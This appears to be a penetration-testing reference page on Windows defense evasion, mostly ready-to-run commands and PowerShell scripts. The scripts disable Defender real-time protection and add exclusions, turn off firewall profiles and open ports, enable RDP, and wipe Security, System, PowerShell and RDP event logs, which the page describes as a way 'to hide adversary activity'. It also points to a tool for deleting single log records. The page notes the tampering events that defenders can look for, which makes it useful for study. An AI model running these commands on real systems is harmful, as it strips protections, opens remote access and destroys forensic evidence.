Defense evasion
Windows Defender
The following PowerShell commands, run from an elevated session, can be used to add exclusions to, or switch off, Windows Defender real-time protection. If Tamper Protection is enabled, Set-MpPreference changes to these settings are blocked, and disabling real-time protection is itself recorded in the Microsoft-Windows-Windows Defender/Operational log (event ID 5001):
# Add the specified folder to Windows Defender's exclusion list.
# The exclusion list can be retrieved using: Get-MpPreference | Ft ExclusionPath
Add-MpPreference -ExclusionPath "<PATH>"
# Disables Windows Defender real-time protection.
Set-MpPreference -DisableRealtimeMonitoring $true
# Disables, in addition to real-time protection, various other protections offered by Microsoft Defender (scanning of scripts and downloaded files, automatic sample submission, etc.).
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
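Before relying on the commands above, it is worth checking whether they will take effect at all. The following is an added example (not code from the original page): it snapshots the Defender state with Get-MpComputerStatus, warns when Tamper Protection is on, applies the exclusion and the real-time protection change, verifies the result instead of trusting the cmdlet, and reverts. $ExclusionPath is a placeholder chosen for this example.

```powershell
# Added example (not from the original page). Run from an elevated PowerShell session.
$ExclusionPath = "C:\Tools"   # assumption: folder the operator wants excluded from scanning

# 1. Current state of the engine before touching anything.
$status = Get-MpComputerStatus
"Real-time protection enabled : $($status.RealTimeProtectionEnabled)"
"Tamper Protection enabled    : $($status.IsTamperProtected)"
"Engine / signature version   : $($status.AMEngineVersion) / $($status.AntivirusSignatureVersion)"

if ($status.IsTamperProtected) {
    Write-Warning "Tamper Protection is on: Set-MpPreference changes to real-time protection will be blocked."
}

# 2. Record the preferences so the change can be reverted at the end of the engagement.
$before = Get-MpPreference
$before | Select-Object DisableRealtimeMonitoring, DisableScriptScanning, DisableIOAVProtection, ExclusionPath

# 3. Apply the changes shown above.
Add-MpPreference -ExclusionPath $ExclusionPath
Set-MpPreference -DisableRealtimeMonitoring $true

# 4. Verify rather than assume: re-read the live status after the change.
$after = Get-MpComputerStatus
if ($after.RealTimeProtectionEnabled) {
    Write-Warning "Real-time protection is still enabled; the change was not applied (Tamper Protection or policy)."
} else {
    "Real-time protection is now disabled."
}
"Exclusions now in place: $((Get-MpPreference).ExclusionPath -join ', ')"

# 5. Revert to the recorded state.
Set-MpPreference -DisableRealtimeMonitoring $before.DisableRealtimeMonitoring
Remove-MpPreference -ExclusionPath $ExclusionPath
```

The verification step matters because a successful-looking cmdlet call says nothing about the engine's actual state; Get-MpComputerStatus reflects what the service is really doing. Expect the toggle to leave event 5001 in the Defender Operational log, so the log-clearing section below applies here too.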
Windows Firewall
To check whether the Windows Firewall is enabled on a server or computer, the following commands can be used as Administrator / SYSTEM:
# Show the profile applied to each network adapter
netsh advfirewall monitor show currentprofile
# Windows Firewall state for all profile (Public / Domain / Private)
netsh advfirewall show allprofiles
Get-NetFirewallProfile
# Show all rules for the given profile
netsh advfirewall firewall show rule profile=<public | private | domain | any | ...> name=all
Get-NetFirewallProfile -Name <Public | Private | Domain | * | ...> | Get-NetFirewallRule
By default, three separate listings are present: Domain profile settings, Private profile settings and Public profile settings. With the Private profile, applied to a network adapter when it is connected to a network that a user or administrator has identified as private, Windows enables network discovery, allows file sharing and other networked features. The Public profile, applied to a network adapter by default or when a user or administrator designates the network as public, is the most restrictive profile: Windows blocks all inbound connections to programs that are not on the list of allowed programs. Finally, the Domain profile is applied when a server or computer is joined to an Active Directory domain and can reach a domain controller. In this environment, firewall settings are typically (but not necessarily) controlled by a network administrator through Group Policy.
Windows blocks inbound connections and allows outbound connections for all profiles by default.
To disable the firewall use the following commands:
# Disable current profile
netsh advfirewall set currentprofile state off
# Disable all profiles
netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -All -Enabled False
# Disable the private, public and domain profiles
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off
netsh advfirewall set domainprofile state off
Set-NetFirewallProfile -Profile <Domain | Private | Public | PROFILE NAME> -Enabled False
To open a specific port, or a range, use the following command:
netsh advfirewall firewall add rule name="<RULE_NAME>" protocol=TCP dir=in localport=<PORT> action=allow
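The netsh commands above have PowerShell equivalents in the NetSecurity module, which also make it easy to verify what was actually created. The following is an added example (not code from the original page): it shows the active profile per connected network, the state and default actions of each profile, opens a TCP port on all profiles, checks the resulting rule and its port filter, and removes the rule again. $RuleName and $Port are placeholders chosen for this example.

```powershell
# Added example (not from the original page). Run from an elevated PowerShell session.
$RuleName = "Example inbound TCP"   # assumption: rule name used for this demonstration
$Port     = 4444                    # assumption: port to open; a range such as "4444-4450" also works

# 1. Which profile is currently applied to each connected network?
Get-NetConnectionProfile | Select-Object Name, InterfaceAlias, NetworkCategory

# 2. State and default actions per profile (default: inbound blocked, outbound allowed).
Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction

# 3. Open the port on all profiles (equivalent of the netsh 'add rule ... action=allow' command).
New-NetFirewallRule -DisplayName $RuleName -Direction Inbound -Protocol TCP `
    -LocalPort $Port -Action Allow -Profile Any | Out-Null

# 4. Verify the rule exists and carries the expected port filter.
$rule = Get-NetFirewallRule -DisplayName $RuleName
"Rule '$RuleName': enabled=$($rule.Enabled) action=$($rule.Action) profile=$($rule.Profile)"
$rule | Get-NetFirewallPortFilter | Select-Object Protocol, LocalPort

# 5. Any other allow rule already covering the same port? (useful before adding a noisy new one)
Get-NetFirewallPortFilter | Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -eq "$Port" } |
    Get-NetFirewallRule | Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' } |
    Select-Object DisplayName, Enabled, Profile

# 6. Cleanup: remove the rule once it is no longer needed.
Remove-NetFirewallRule -DisplayName $RuleName
```

Step 5 is the check a practitioner wants before creating a rule: if an existing rule already allows the port, adding a new one only creates an extra artifact for defenders to find.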
Activate RDP
RDP can be enabled / disabled without the need to restart the system with the reg utility:
# Check whether something is listening on the default RDP port
netstat -an -p tcp | findstr ":3389"
# If RDP is enabled, the registry value should be equal to 0x0
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Allow RDP through the firewall by enabling the built-in "Remote Desktop" rule group
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Disable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
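The same procedure from PowerShell, with the checks the reg / netsh commands leave out. This is an added example (not code from the original page): it reads the current value, enables RDP, keeps Network Level Authentication switched on, enables the firewall rule group, makes sure the Remote Desktop service is running, and confirms that a listener is actually bound to the port before declaring success. It assumes the default RDP port (3389) and an English display group name for the firewall rules.

```powershell
# Added example (not from the original page). Run from an elevated PowerShell session.
$TsKey  = "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server"
$NlaKey = "$TsKey\WinStations\RDP-Tcp"
$RdpPort = 3389   # assumption: default port; the real one is the PortNumber value under RDP-Tcp

# 1. Current state: 0 = connections allowed, 1 = denied.
$denied = (Get-ItemProperty -Path $TsKey -Name fDenyTSConnections).fDenyTSConnections
"fDenyTSConnections before: $denied"

# 2. Enable RDP (same effect as the 'reg add ... /d 0' command above).
Set-ItemProperty -Path $TsKey -Name fDenyTSConnections -Value 0 -Type DWord

# 3. Keep NLA on (UserAuthentication = 1). Setting it to 0 exposes the login screen before authentication.
Set-ItemProperty -Path $NlaKey -Name UserAuthentication -Value 1 -Type DWord

# 4. Equivalent of 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'.
#    -DisplayGroup is the localized name; it is "Remote Desktop" on English systems.
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# 5. The listener only appears while TermService is running.
if ((Get-Service TermService).Status -ne 'Running') { Start-Service TermService }
Start-Sleep -Seconds 2

# 6. Verify: is anything listening on the RDP port? (replaces 'netstat | findstr 3389')
$listener = Get-NetTCPConnection -LocalPort $RdpPort -State Listen -ErrorAction SilentlyContinue
if ($listener) {
    "RDP listener up on $(($listener.LocalAddress | Sort-Object -Unique) -join ', ') port $RdpPort"
} else {
    Write-Warning "No listener on port $RdpPort; check the TermService state and Group Policy."
}

# 7. Disable again once done (cleanup).
Set-ItemProperty -Path $TsKey -Name fDenyTSConnections -Value 1 -Type DWord
```

The listener check is the one that matters: a Group Policy that sets fDenyTSConnections will silently win over the registry edit at the next policy refresh, so the registry value alone does not prove that RDP is reachable.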
Windows logs clearing
Windows event logs track the activity and a number of operations conducted on the system. The following notable logs, stored as EVTX files in %systemroot%\System32\winevt\Logs, may be of interest for forensic analysis (and should thus be cleared in priority to hide adversary activity):
- Security.evtx: user logon / logoff, local accounts and groups operations, process creation (with command line, if enabled), etc.
- System.evtx: Windows service operations (installation, start / stop, deletion, etc.).
- Windows PowerShell.evtx and Microsoft-Windows-PowerShell%4Operational.evtx: PowerShell activity, with a varying level of detail depending on the system configuration (activation of the non-default Module Logging, Script Block Logging, etc.).
- Microsoft-Windows-TaskScheduler%4Operational.evtx: scheduled tasks operations (registration, execution, deletion, etc.); this log is disabled by default on recent Windows versions.
- Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx, Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx and Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx: RDP activity, such as access to the Windows login screen and remote interactive logons over RDP.
- Microsoft-Windows-WinRM%4Operational.evtx: WinRM activity, including PowerShell remoting sessions.
- Microsoft-Windows-Shell-Core%4Operational.evtx: programs executed through the Run / RunOnce ASEP registry keys.
- Microsoft-Windows-AppLocker%4EXE and DLL.evtx and Microsoft-Windows-AppLocker%4MSI and Script.evtx (and the other Microsoft-Windows-AppLocker%4*.evtx logs): execution of binaries and scripts if AppLocker is configured, in Audit only or Enforce mode (not configured by default).
Note that upon clearing of some EVTX logs (such as the Security and System logs), specific events are generated to keep a trace of the clearing (Security event ID 1102 and System event ID 104, both recording the account that performed the action). Refer to the [DFIR] Windows - EVTX integrity note for more information on the Windows events generated by log clearing.
# Clears the specified log using the wevtutil built-in utility (the argument is the channel name, not the .evtx file name).
wevtutil cl <security | system | LOG_NAME>
# Clears the specified log using the Clear-EventLog PowerShell cmdlet.
Clear-EventLog -LogName <Security | System | LOG_NAME>
# Clears all the classic event logs (Application, Security, System, etc. as listed by Get-EventLog -List).
# Get-EventLog does not list the ETW-based Applications and Services logs (PowerShell, TaskScheduler, TerminalServices, etc.).
$AllLogs = Get-EventLog -List | ForEach-Object { $_.Log }
$AllLogs | ForEach-Object { Clear-EventLog -LogName $_ }
# Clears every log / channel registered on the system, including the ETW operational channels listed above.
wevtutil el | ForEach-Object { wevtutil cl "$_" }
EventCleaner can be used to delete individual records from an EVTX log rather than clearing the whole log:
https://github.com/QAX-A-Team/EventCleaner
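To see what the clearing actually removes and what it leaves behind, the following added example (not code from the original page) enumerates the logs listed above by channel name, prints their record counts and file sizes, clears them, and then pulls the Security 1102 / System 104 events that record the clearing itself. The channel names are the standard ones; the file on disk is the channel name with "/" replaced by "%4" plus the .evtx extension.

```powershell
# Added example (not from the original page). Run elevated: clearing Security requires SeSecurityPrivilege.
$Targets = @(
    'Security',
    'System',
    'Windows PowerShell',
    'Microsoft-Windows-PowerShell/Operational',
    'Microsoft-Windows-TaskScheduler/Operational',
    'Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational',
    'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational',
    'Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational',
    'Microsoft-Windows-WinRM/Operational',
    'Microsoft-Windows-Shell-Core/Operational',
    'Microsoft-Windows-AppLocker/EXE and DLL',
    'Microsoft-Windows-AppLocker/MSI and Script'
)

# 1. Size up each target before touching it (channel name -> on-disk file name shown for reference).
foreach ($name in $Targets) {
    $log = Get-WinEvent -ListLog $name -ErrorAction SilentlyContinue
    if ($null -eq $log) { "{0,-72} (channel not present)" -f $name; continue }
    $file = ($name -replace '/', '%4') + '.evtx'
    "{0,-72} {1,8} records {2,12:N0} bytes enabled={3}  [{4}]" -f $name, $log.RecordCount, $log.FileSize, $log.IsEnabled, $file
}

# 2. Clear each target. wevtutil takes the channel name; errors (e.g. missing channel) are suppressed.
foreach ($name in $Targets) { wevtutil cl "$name" 2>$null }

# 3. Confirm the record counts dropped.
foreach ($name in @('Security', 'System')) {
    $log = Get-WinEvent -ListLog $name -ErrorAction SilentlyContinue
    if ($log) { "{0,-10} now holds {1} record(s)" -f $name, $log.RecordCount }
}

# 4. The clearing leaves its own trace: Security 1102 and System 104 name the account that did it.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102 } -MaxEvents 1 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 104 } -MaxEvents 1 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message
```

Step 4 is the practical caveat: a freshly cleared Security log whose first record is a 1102 is itself a strong indicator of tampering, which is why record-level deletion tools such as EventCleaner exist. Also note that events forwarded to a collector or SIEM before the clearing are unaffected by anything done on the host.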